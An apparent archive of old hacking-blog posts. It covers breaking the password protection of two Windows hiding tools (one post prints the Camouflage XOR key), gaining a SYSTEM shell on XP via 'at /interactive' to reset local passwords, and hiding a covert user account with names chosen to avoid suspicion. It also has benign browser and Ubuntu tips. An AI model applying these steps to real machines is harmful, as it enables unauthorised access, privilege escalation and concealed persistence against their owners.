C:\abcdefghijklmnopqrstuvwxyz1234567890
X:*zyxwvutsrqponmlkjihgfedcba3215894067

Looks like the alphabet is just backwards. "/" becomes "*". The only thing different is the numbers but not that big of a deal, since we now see the key above anyways. So now we can decrypt the Declaration and Javax keys. they point to the folders, both hidden and unhidden names, just as we thought.

The last is the getPrefix key. I had one folder unhidden when I was working and the key value changed to "W". So it seems that "E" means it is hidden, "W" means not hidden. So I'd Say we have this down now.

Finding The Password

Last thing to attack is the password for the program (in this case it is "Password"). Let's check more into the registry. There is one more key here:

BAR - Kzhhdliw

Surprise. my password and this key are both the same length. the 3rd and 4th characters repeat. Let's just try to decrypt it with our key chart above and... yep, that's our password... So with this information I was able to code a little tool that can exploit this to prove concept for academic reasons (And to only be used for that). I call the tool "Free Unhide Folder" (original huh?).

Resources

CleanerSoft Free Hide Folder:
http://www.cleanersoft.com/hidefolder/free_hide_folder.htm

Substitution cipher:
http://en.wikipedia.org/wiki/Substitution_cipher

Substitution cipher solver:
http://www.purplehell.com/riddletools/applets/cryptogram.htm

Free Unhide Folder (Source[vb.net 2008] and Binary):
http://packetstormsecurity.org/1010-exploits/FreeUnHideFolder.zip

8 Firefox Add-ons to help manage the web

2010-06-07T22:43:00.011-04:00

Adblock Plus

This one is a must! block annoying ads, avoid tracking cookies, and save your self some bandwidth (helps speed things up for everyone by not downloading ad images). This ad blocker also uses an anti-virus like subscription list which updates to avoid new ad servers all together. if it fails to block an ad. you can block it yourself; By frame, single image, or even the server (and supports wildcards like *).

NoScript

Noscript Allows you to disable javascript and select which sites can run javascript on your browser. This help protect against IFRAMES and other XSS attacks..

leetkey

Leetkey allows you to convert strings to other encoding and vice versa. binary, Hex, Base64, l33t, Rot13, Reverse, and even morse code. It also has a encryption module on it to encrypt and decrypt strings. Below are a few examples of these things encoded with leetkey.

Normal String: This is a test string

Reverse String: gnirts tset a si sihT

leet: 7h15 15 4 7357 57r1n6

Binary: 01010100 01101000 01101001 01110011 00100000 01101001 01110011 00100000 01100001 00100000 01110100 01100101 01110011 01110100 00100000 01110011 01110100 01110010 01101001 01101110 01100111

Hex: 54 68 69 73 20 69 73 20 61 20 74 65 73 74 20 73 74 72 69 6e 67

Rot13: Guvf vf n grfg fgevat

URL Encoding: This+is+a+test+string

Morse Code: - .... .. ... .. ... .- - . ... - ... - .-. .. -. --.

DES encrypted with password test: olZule+WVI7q4HtjQ90td/TiLFgBALW0GJmr0oMB958=

ShowIP

This shows you the IP address of server you are connected to in your status bar and always you to run whois, netcraft, Whoishostingthis.com, and ip2country. Good for security. If your at a wifi Hotspot and it shows your web-mail log-in page IP address is in the same LAN subnet, you are probably the victim of DNS Poisoning or a man-in-the-middle attack my friend. It might be worth your time to investigate the IP or move to a less hostile network.

Fireshot

This tool allows you to capture an entire web page from the browser top to bottom or just a section or what is visible or the entire window and has a built in editor for cropping.

FireBug and Firecookie

These two work together. Firebug can help you, in real time, debug a web page, highlights the code section on the page. also allows you to edit the code and then update it in real time (great for modifying web forms ;-] ). Firecookie allows you to look at your site cookie in real-time and edit and delete values in real time. All this is nicely done at the bottom of the browser! A MUST FOR WEB DEVELOPERS AND HACKERS ALIKE!

Advance Dork

This tool allows you to right click and quickly craft advanced google searches based on the information on the web page using google operators like intitle: site: etc. Good tool for digging into a site using google ;-) if your unfamiliar with all this I suggest you read a book called "Google Hacking for penetration testers"

Not getting Sound in flash in Ubuntu? Try this! Worked for me!

2010-03-20T22:56:00.003-04:00

Found this at http://ubuntuforums.org/showthread.php?t=204022

This is awesome.Flash looks for /usr/lib/libesd.so.1 and expects /tmp/.esd/socket to exist. By using these 3 commands, you can create them and flash will work. you will have to restart firefox if that is what lead you here ;-)

the commands are as follows:
sudo ln -s /usr/lib/libesd.so.0 /usr/lib/libesd.so.1
sudo mkdir -p /tmp/.esd/
sudo touch /tmp/.esd/socket

This worked for me, so I share it with you in hopes it helps. Because now I can listen to the portal "Still alive" theme XD

How to Disable Vibrant Ads.

2010-01-19T12:05:00.004-05:00

On any browser with cookies enabled, click on the following link.

http://www.vibrantmedia.com/whatisIntelliTXT.asp?ipid=7540&cc=us&server=business.msnbc.us.intellitxt.com

Click on the disable tab. Then Click the link to disable the ads and your done! How kind of them to leave it up to the user to choice to see the ads or not.

Creating hidden accounts on a XP Box

2010-01-08T09:27:00.036-05:00

Others want to log in to XP under your name?
Need to have an account under the radar?

Whatever the need, note it can be done!

The problem is that user accounts always show up on the welcome screen on XP. Our goal is to hide them from there using a simple Windows registry tweak. This tweak requires an existing account, so use one thats already there or create a new one. I would recommend the later!

Now go into the Registry (click on "start" > "Run" and type "Regedit" (without quotes) and hit enter).

Now go to:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList

Now right-click on the pane on the right and create a new DWORD. Make the name from "New Value #1" to the same as the AccountName you wish to hide. Example: if I wanted to hide an Account called StealthyMoFo, the DWORD Name would be StealthyMoFo.

Now double-click on the name and set the data value:

0 to hide it
1 to make it visible

Now exit the registry and reboot the machine for this to take effect.

To logon using this new account, when you see the welcome screen, hold down "ctrl+alt" and hit delete twice. this should take you to a normal username\password prompt like Windows 2000. Enter the name and password of the hidden account to log on.

Two Side Notes:

This can be used to also force the Administrator account to show up on the welcome screen as it does in safe mode.

Your hidden account will still have a folder under Documents and Settings. So if someone see's it, they might suspect something. Try to use something that sounds like it might belong there like "RemoteService" or "DotNet" or "Admin". Most people wouldn't rise an eyebrow as those would seem like normal application/User accounts.

fun with Explorer.exe running under SYSTEM account.

2010-01-04T14:37:00.023-05:00

In windows xp it is possible to obtain an process of explorer.exe running as the SYSTEM account.

--==[ Obtaining Explorer.exe Running as SYSTEM ]==--

To obtain our shell we will use the command line and the "at" command. Once you have the shell open type the following command:

at {Time_in_military_format_plus_one_min} /interactive cmd.exe

Example if time were 5:45 PM: at 17:46 /interactive cmd.exe

This will give us a command prompt in one min. The interesting thing about this command prompt is the title. The title should read something like "C:\windows\system32\svchost.exe". That allow is interesting! Check your taskmanager, This process of CMD.EXE will be running under the user SYSTEM!

With That being said, anything spawned via this shell should run under the context of the SYSTEM account. Try it out, run notepad.exe from under that shell and check your taskmanager.

Now it's time to get that Explorer Running under SYSTEM. Use the task manager to kill the process of explorer.exe that is running under your account and then run explorer.exe in the command shell that is running as system, It's that easy!

With our Explorer running as SYSTEM anything that you launch with a double-click runs as SYSTEM as well. Now the fun starts. What to do? What to do?

--==[ Abusing Explorer.exe as SYSTEM ]==--

I'm sure there are more things then listed here. But here are the two I like ;-).

1) Ignore local file permissions. Even with a users Documents and Settings set as private, as SYSTEM you can still travel through it. I used to use this when looking through a hard drive that was pulled from another PC and the user needed files from under there documents and settings.

2) Change the password on a local account without knowing the old password! How cool is that! that includes local admin accounts!

Now have fun, figure out what else you can do with it and don't use this for anything illegal.

Analyzing And Cracking Camouflage

2009-07-25T20:32:00.004-04:00

Personally Discovered through my experiments.

Camouflage is what is known as a steganography program. A steganography program that works to hide data from people where they wouldn't be likely to look for it. Camouflage (which can be downloaded from their website here) is a program that will let you take a data file and hide it behind another file. Sounds pretty cool right? But how secure is it? That's What we are here to find out.

First and Foremost. To follow along you will need a few tools:

Camouflage - Download Here
A text editor
A good Hex Editor (I use Hex Workshop)
a JPEG file
and a brain Probably wouldn't be bad either

Okay so lets study the behavior of this program. First we will create a text file with the text "This is a hidden Message to hide using Camo". Save it and call it hidden.txt. Once you have done this grab an jpeg image. This image is clean and has nothing attached to it. It is 4.15 KB (4,259 bytes) at the moment. Feel free to download and use it.

{Please Note: I didn't make this image and wish to give credit to it's creator. however I don't remember who that is or were i got this image {probably Deviant Art} from or even how long ago it was. If you are the artist who made this image PLEASE LET ME KNOW SO I CAN GIVE YOU THE CREDIT YOU SO RIGHTFULLY DESERVE}.

Now after installing camouflage, hide the hidden.txt file behind our image. To do this, Right click on hidden.txt and go to "Camouflage". The Program window will appear, click on "next". On the next screen browse to the image file and click "next". On this screen give it at new name(for study purposes I called mine thcry-test.jpg). On the next part it ask for a password. I used "test". This is my new image.

Now We have a new image with data Hidden behind it. Visually, Nothing happened. However the size did increase quite a bit 5.03 KB (5,157 bytes). Our text file is only 43 bytes but our image INCREASED 898 btyes! Interesting, this means 856 btyes extra. So lets increase the text file by one byte with the same password and see what happens.

The new image only increase one byte! which means that the extra 856 bytes must have been for the program to structor and encapsulate the data it wants to hide! What does this mean. It means we should be able to tweak some minor settings and reverse engineer that structor by watching what changes. Now, The main reason I used the JPEG is that the end of a jpeg always ends with hex bytes 0xFF 0xD9. Thats the way the file format works, and that is what image viewers look for to stop loading the image data. Now open the 3 images in a hex editor. The original ends with 0xFF 0xD9. The other two however are ending with with a ton of 0x20, which is an ASCII space (same as hitting space on your key board). After the 0xFF 0xD9, we have a small cluster of data before the large packets of spaces. All this data is different with the exception of a string RIGHT AFTER the 0xFF 0XD9 which is 0x20 0x00 0xE2 0x0B 0xCA 0x01 0xF8 0xB5 0xF5 0x01. So why did the rest change so much while this string stayed the same? It's some setting which camo must be able to decrypt or read without a user supplied data

Now it is time. Lets use the 42 byte text file again and lets create 5 new files using the passwords "A", "AA","AAA", "AAAA", "AAAAA". Here they are.

After this, The string listed above remains static. But more interesting is there are other parts in the Hex 0x20 that stay static as well. However most note able was at offset 0x00001309-0x00001313. This was static with data after it that changed... BUT WAS ALWAYS THE SAME LENGTH AS THE PASSWORD! Furthermore the password was a repeating character "A". Which this data is the same length but as it grows the data *wasn't* changing! If you are familar with XOR logic encryption, then you should already see this is what it looks like we're dealing with. If your not familar with XOR please take a look at this or This link here berfore you continue!

So a Weakness Exist in XOR since it is a reversable encryption. There are three parts to it. The PlainText, The Key, and the Cipher text. As long as you have two of the 3, you can XOR them to get the missing part. So we Know the AAAA plaintext; which converted from ASCII to hex an "A" is 0x41, and we know it's Cipher text. So we are missing the key. We can for a quick example try to XOR 0x41414141 by 0x43D43B63 and should get a key, which should decrypt the "test" password as well. Microsoft actually provide Hex and XOR in the normal calculator that comes with windows under the Scientfic view.

So with this said. I noticed the only part the same on the pic with "test" password was the location and 0x02 0x00 so that marks the beginning of the poorly protected password. Now all we would do is make a password of about 256 A's and we will have a key that should be capable of decrypting most passwords for it. At this point I assume you Know how it would work. So I will Skip the steps and present you with the key which is in hex:

02957A220CA614E1E1CFBF65206F9EB399654A53FBF67554AD23CD7E9C29
E7FCE2F94DD2424E06C0F89A1C623874240055DF41CB01A2B7F38F8ADDAC
33836029F378243E7AEBD3E49D9D43944AC7456D2574EB0B98C97CFCC8BA
326B00D3C5C29434AFB0E5957D2A84A45FE56E272ADB967E3E483946CF6F
71AA3C319AA99E8F8973B339CA32D5F031597C022E8637F92B7E51F24181
0CD46515F770D4199820BF20B85567CC81188C133C633C9211E45B1B0822
604C4AC58AB3C575C3907AF2B2B6C8D0388AC286F0ACE9CA5C4E3E092978
29995A84D5BA5ED5927A38FAD060ECF527BAEEB7DE9F9BDE65D47639769C
DA688DA8A0A61ED9DB0F4DAB92CD71

Know we know that it is weak to this key because the password can be recovered. Also I thought Question 10 on the FAQ of Camouflage's site was cute.

Taken from http://camouflage.unfiction.com/FAQ.html#Q10

10. I've forgotten my password and can't uncamouflage a file. What can I do?

Camouflage always asks you for a password whether the file is camouflaged or not, or whether it is a camouflaged file with a password or not. This is because Camouflage doesn't give the game away that a file may be camouflaged. For security reasons we cannot release a program to reveal passwords in camouflaged files. If you forget your password we can't usually help you.
Be careful when typing in passwords - check your CAPS LOCK because Camouflage passwords are case-sensitive.

I have taken the time to code a program to recover these passwords and also test a file for signs of camouflage. I called this program "IfraReD" because IfraRed goggles can help you see someone wearing camouflage. This Program was coded in Visual Basic 6 and is open soruce (Nice and commented this time! ;-D ). As you can see it is very effective. After you have the password, Just use camouflage to decrypt it. Below is the program in action with the password on this picture.

Now you have a tool to recover the password! How do you locate the files that would contain hidden information? Well how about the registry!

HKEY_CURRENT_USER\Software\Camouflage\CamouflageFile has the name of files used for hiding (the original ones).

Also you should see:
HKEY_CURRENT_USER\Software\Camouflage\OutputFile Shows a list of the Output files with the hidden data! This can also be used against them as most people always use the same password everywhere, therefore, Crack this one and chances are it will work elsewhere. Enjoy!

Resources and Further Reading

InfraRed
w/ binary, source, and test files. 50.3 kB
Download

Camouflage
http://camouflage.unfiction.com/

XOR Encryption
http://en.wikipedia.org/wiki/XOR_cipher
http://www.tech-faq.com/xor-encryption.shtml

Further Reading
Hiding in Plain Sight: Steganography and the Art of Covert Communication